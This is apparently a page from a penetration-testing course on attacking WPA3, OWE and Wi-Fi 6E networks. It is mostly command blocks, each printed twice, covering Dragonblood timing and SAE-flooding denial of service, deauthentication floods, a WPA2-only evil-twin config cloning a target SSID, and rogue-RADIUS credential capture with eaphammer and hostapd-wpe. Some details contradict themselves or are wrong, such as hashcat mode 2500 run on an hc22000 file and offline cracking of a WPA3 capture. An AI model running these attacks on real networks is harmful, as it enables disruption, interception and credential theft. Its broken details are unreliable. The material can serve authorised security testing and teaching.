WPA3 & Wi-Fi 6/6E

Advanced Wireless
🔥 Advanced
T1557 T1110

Attacking modern wireless standards including WPA3-SAE, OWE, and 6GHz networks.

Dragonblood — WPA3's Key Vulnerability

The Dragonblood attack (CVE-2019-9494) exploits timing and cache-based side-channels in the SAE (Simultaneous Authentication of Equals) handshake. Unlike WPA2, you cannot capture a reusable offline hash — but you can force dictionary attacks against a live AP using timing information. WPA3 Transition Mode (mixed WPA2/WPA3) is also vulnerable to downgrade to WPA2.

Warning

Hardware Compatibility Warning: Wi-Fi 6E (6GHz) scanning requires specific hardware support (e.g., Intel AX210, MediaTek MT7921AU). Standard 2.4/5GHz adapters will not detect these networks.

📑 Table of Contents

WPA3-SAE (Simultaneous Authentication of Equals)

WPA3 replaces the traditional 4-way handshake with the Dragonfly key exchange (SAE). This protocol is designed to resist offline dictionary attacks by preventing an attacker from verifying a guessed password without interacting with the live network. However, it is still vulnerable to side-channel attacks (like Dragonblood) and downgrade attacks.

To capture the handshake, we use hcxdumptool to interact with the target AP.

capture.sh
bash 
hcxdumptool -i wlan0 --enable_status=1 -o dump.pcapng
hcxdumptool -i wlan0 --enable_status=1 -o dump.pcapng

Once captured, we can attempt to crack the password using hashcat mode 2500.

crack.sh
bash 
hashcat -m 2500 dump.hc22000 wordlist.txt
hashcat -m 2500 dump.hc22000 wordlist.txt

SAE-PK & Downgrade Attacks

Many networks operate in "Transition Mode" (WPA2/WPA3 mixed) to support older devices. An attacker can force a victim client to downgrade to WPA2 by jamming the WPA3 beacons or forging management frames, allowing for traditional WPA2 attacks.

OWE (Opportunistic Wireless Encryption)

OWE, or "Enhanced Open," provides encryption for open networks without authentication. It uses Diffie-Hellman key exchange to encrypt data traffic.

In OWE Transition Mode, the AP broadcasts a hidden OWE SSID and a visible Open SSID. Attackers can strip the OWE tag from the beacon frames, forcing clients to associate with the Open network without encryption, enabling Man-in-the-Middle attacks.

Wi-Fi 6E (6GHz) Scanning

Wi-Fi 6E introduces the 6GHz band, offering more channels and less interference. However, standard 2.4GHz/5GHz adapters cannot see these networks. You must use 6GHz-capable hardware like the Intel AX210 or MediaTek MT7921AU.

Scanning the 6GHz band requires specifying the correct frequencies.

scan-6ghz.sh
bash 
iw dev wlan0 scan freq 5955 6115
iw dev wlan0 scan freq 5955 6115

Dragonblood Attack Deep Dive

The Dragonblood attack (CVE-2019-9494, CVE-2019-9495) exploits two weaknesses in the WPA3-SAE Dragonfly handshake:

⏱️ Timing Side-Channel (CVE-2019-9494)

The SAE handshake uses hunting-and-pecking to convert the password into an elliptic curve point. The number of iterations depends on the password — an attacker measures the time the AP takes to respond and uses this to partition the password space in a dictionary attack.

💾 Cache Side-Channel (CVE-2019-9495)

On shared hardware (VMs, cloud APs), cache-timing attacks leak information about which branch the password-to-element conversion takes, reducing the search space for offline dictionary attacks.

dragonblood-attack.sh
bash 
# Dragonblood timing attack (requires dragondrain/dragontime/dragonforce tools)
# Step 1: Install Dragonblood tools
git clone https://github.com/vanhoefm/dragonblood
cd dragonblood

# Step 2: Measure SAE commit timing
# This sends SAE authentication requests and measures response times
python3 dragontime.py -i wlan0 -t <AP_BSSID> -w wordlist.txt

# Step 3: Partition attack — use timing data to rank password candidates
python3 dragonforce.py -t timing_data.json -w wordlist.txt

# Step 4: Denial of Service via SAE flooding
# SAE commit messages are computationally expensive for the AP
python3 dragondrain.py -i wlan0 -t <AP_BSSID>
# This can overload low-powered APs (IoT, consumer routers)

# Transition mode downgrade (force WPA2 fallback)
# Jam WPA3 beacons while allowing WPA2 beacons through
# Then perform standard WPA2 handshake capture
sudo mdk4 wlan0mon d -b <BSSID>          # Selective deauth
sudo airodump-ng -c <CH> -w capture wlan0mon  # Capture WPA2 handshake
# Dragonblood timing attack (requires dragondrain/dragontime/dragonforce tools)
# Step 1: Install Dragonblood tools
git clone https://github.com/vanhoefm/dragonblood
cd dragonblood

# Step 2: Measure SAE commit timing
# This sends SAE authentication requests and measures response times
python3 dragontime.py -i wlan0 -t <AP_BSSID> -w wordlist.txt

# Step 3: Partition attack — use timing data to rank password candidates
python3 dragonforce.py -t timing_data.json -w wordlist.txt

# Step 4: Denial of Service via SAE flooding
# SAE commit messages are computationally expensive for the AP
python3 dragondrain.py -i wlan0 -t <AP_BSSID>
# This can overload low-powered APs (IoT, consumer routers)

# Transition mode downgrade (force WPA2 fallback)
# Jam WPA3 beacons while allowing WPA2 beacons through
# Then perform standard WPA2 handshake capture
sudo mdk4 wlan0mon d -b <BSSID>          # Selective deauth
sudo airodump-ng -c <CH> -w capture wlan0mon  # Capture WPA2 handshake

WPA3 Transition Mode Exploit

Most WPA3 deployments currently run in Transition Mode (WPA2/WPA3 mixed) to maintain backward compatibility. This completely undermines WPA3 security — an attacker can force any client to downgrade to WPA2.

transition-downgrade.sh
bash 
# Step 1: Identify transition mode networks
sudo airodump-ng wlan0mon
# Look for networks showing both WPA2 and WPA3 in the "ENC" column

# Step 2: Create evil twin broadcasting WPA2-only
# Clone the target SSID but only advertise WPA2
sudo hostapd -B evil_twin.conf
# evil_twin.conf:
#   ssid=TargetNetwork
#   wpa=2
#   wpa_passphrase=anything
#   wpa_key_mgmt=WPA-PSK

# Step 3: Deauth clients from real AP
sudo aireplay-ng -0 0 -a <REAL_AP_BSSID> wlan0mon

# Step 4: Clients reconnect to evil twin using WPA2
# Capture the WPA2 4-way handshake and crack normally
# WPA3-SAE protection is completely bypassed

# Automated approach with wpa_sycophant
git clone https://github.com/vanhoefm/wpa_supplicant-sycophant
# Relay tool that exploits transition mode to capture credentials
# Step 1: Identify transition mode networks
sudo airodump-ng wlan0mon
# Look for networks showing both WPA2 and WPA3 in the "ENC" column

# Step 2: Create evil twin broadcasting WPA2-only
# Clone the target SSID but only advertise WPA2
sudo hostapd -B evil_twin.conf
# evil_twin.conf:
#   ssid=TargetNetwork
#   wpa=2
#   wpa_passphrase=anything
#   wpa_key_mgmt=WPA-PSK

# Step 3: Deauth clients from real AP
sudo aireplay-ng -0 0 -a <REAL_AP_BSSID> wlan0mon

# Step 4: Clients reconnect to evil twin using WPA2
# Capture the WPA2 4-way handshake and crack normally
# WPA3-SAE protection is completely bypassed

# Automated approach with wpa_sycophant
git clone https://github.com/vanhoefm/wpa_supplicant-sycophant
# Relay tool that exploits transition mode to capture credentials

WPA3-Enterprise (192-bit / CNSA)

WPA3-Enterprise introduces a 192-bit security mode using the Commercial National Security Algorithm (CNSA) Suite. This enforces:

  • AES-256-GCM for data encryption (vs AES-128-CCM in WPA2)
  • 384-bit ECDSA/ECDH for key exchange
  • SHA-384 for HMAC
  • BIP-GMAC-256 for management frame protection
  • Mandatory Protected Management Frames (802.11w)
wpa3-enterprise.sh
bash 
# Identify WPA3-Enterprise networks
sudo airodump-ng wlan0mon --encrypt wpa3
# Look for "SAE" or "OWE" or "SUITE_B_192" in key management

# Attack vectors for WPA3-Enterprise:
# 1. Downgrade attack (if transition mode enabled)
#    Same technique as WPA3-Personal transition mode
#
# 2. Rogue RADIUS server
#    Set up evil twin with eaphammer targeting legacy EAP methods
sudo eaphammer -i wlan0 --auth wpa-enterprise --essid CorpWiFi \
  --creds --negotiate balanced
#
# 3. Certificate impersonation
#    If clients don't validate server certificates (common misconfiguration)
#    hostapd-wpe can capture EAP-TLS/PEAP/TTLS credentials
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
#
# 4. EAP-TLS relay (more advanced)
#    Relay authenticated TLS session to the real RADIUS server
#    Requires: eapmd5pass, eapeak, or custom tooling

# Note: Pure WPA3-Enterprise 192-bit with certificate pinning
# and no transition mode is extremely difficult to attack.
# Focus on client-side misconfigurations.
# Identify WPA3-Enterprise networks
sudo airodump-ng wlan0mon --encrypt wpa3
# Look for "SAE" or "OWE" or "SUITE_B_192" in key management

# Attack vectors for WPA3-Enterprise:
# 1. Downgrade attack (if transition mode enabled)
#    Same technique as WPA3-Personal transition mode
#
# 2. Rogue RADIUS server
#    Set up evil twin with eaphammer targeting legacy EAP methods
sudo eaphammer -i wlan0 --auth wpa-enterprise --essid CorpWiFi \
  --creds --negotiate balanced
#
# 3. Certificate impersonation
#    If clients don't validate server certificates (common misconfiguration)
#    hostapd-wpe can capture EAP-TLS/PEAP/TTLS credentials
sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf
#
# 4. EAP-TLS relay (more advanced)
#    Relay authenticated TLS session to the real RADIUS server
#    Requires: eapmd5pass, eapeak, or custom tooling

# Note: Pure WPA3-Enterprise 192-bit with certificate pinning
# and no transition mode is extremely difficult to attack.
# Focus on client-side misconfigurations.

6GHz Hardware Compatibility

Adapter / Chipset Bands Monitor Mode Injection Notes
Intel AX210 2.4/5/6 GHz Limited Best for scanning; injection requires patched driver
MediaTek MT7921AU 2.4/5/6 GHz Alfa AWUS036AXML — best 6GHz pentest adapter
Qualcomm QCA6696 2.4/5/6 GHz Firmware-locked; found in consumer devices only
Broadcom BCM4389 2.4/5/6 GHz Mobile chipset (Samsung/Google phones); no USB form factor
07. WEP Cracking 09. SDR & RF Hacking

Related Topics

Wireless Setup

Configure your adapter for monitor mode.

WPA Cracking

Traditional WPA2 cracking techniques.

Enterprise Attacks

Attacking WPA-Enterprise networks.